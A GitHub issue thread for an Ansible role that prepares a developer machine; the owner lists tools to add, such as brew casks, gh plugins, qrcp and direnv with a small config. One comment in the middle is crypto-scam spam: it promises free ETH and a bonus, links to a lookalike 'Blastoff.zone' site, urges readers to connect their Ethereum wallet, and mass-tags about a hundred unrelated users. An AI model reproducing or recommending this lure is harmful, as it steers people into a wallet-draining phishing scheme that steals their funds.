### ISSUE TITLE
add apps

### ISSUE THREAD

**Issue by veerendra2** [veerendra2/ansible-role-prepare_dev_setup#19]
- [ ] ~brew install --cask automute~
- [x] brew install --cask stats
- [ ] add gh plugins
  ```
  gh branch  mislav/gh-branch    7ed0aff7
  gh dash    dlvhdr/gh-dash      v3.11.0
  gh notify  meiji163/gh-notify  9a5bfafb
  ```

**Comment by veerendra2** [comment]
- [ ] Add `qrcp`; https://github.com/claudiodangelis/qrcp

**Comment by Denniskipkogei** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
BedirT, @timecon, @diegorv, @jakeprem, @seancarroll, @akhercha, @RodH257, @Sirri69, @devezpace, @yamakasiluke, @duyhien1992, @PabloPRP, @kilianbreathnach, @ic-hacker, @shuyue426, @blackstrip, @lichong0309, @jollen, @marioernestoms, @brcordeiro, @benqian, @plg723, @thevuuranusls, @zaicheng-qi, @buraksezer, @swim86unifyd, @jennazenk, @sinameraji, @nvoynov, @ping203, @0xJuancito, @PY1CX, @MathisChalumeau, @thenotoriousbige, @junpayment, @serejandmyself, @dakra, @youngchief-btw, @evankervella, @ParkHyeonSeong, @htsh-tsyk, @dvasiliauskas, @Scread-zy, @nurul3101, @eiuapp, @StevenKKC, @josedumagay, @keerthivasanm, @andrewdong14, @thijstriemstraConorWright, @unickname3, @mustapha1509, @511121418, @markronquillo, @the-black-knight-01, @1160300315, @lucasfcosta, @weihungchin, @alam00179, @Bhishek29, @andreystarkov, @WangZhenhuaFirst, @chrisbra, @nunosilva800, @wcywxq, @idevsoft, @johnhenry, @chaalpritam, @s4n, @RickyWanga, @pepe, @philos3, @popenkomaksim, @PKriwin, @dzmitry-lahoda, @jun85664396, @Nydhal, @banalak, @jingminglang, @ciphersaw, @MellowX, @xiaocong, @bingghost, @songxianjin, @Parth11791, @budparr, @capaci, @pandazheng, @stanzhai, @niiamon, @jakeauyeung, @yadukrishnapb, @GeorgiNedyalkov, @offsounder, @7flash, @jahyun-dev, @aviexk, @rickbert, @kangkot

**Comment by veerendra2** [comment]
- [ ] Install https://direnv.net/
- [ ] Generate below config and store in `~/.config/direnv/direnv.toml`
  ```toml
   [global]
   load_dotenv = true
  ```
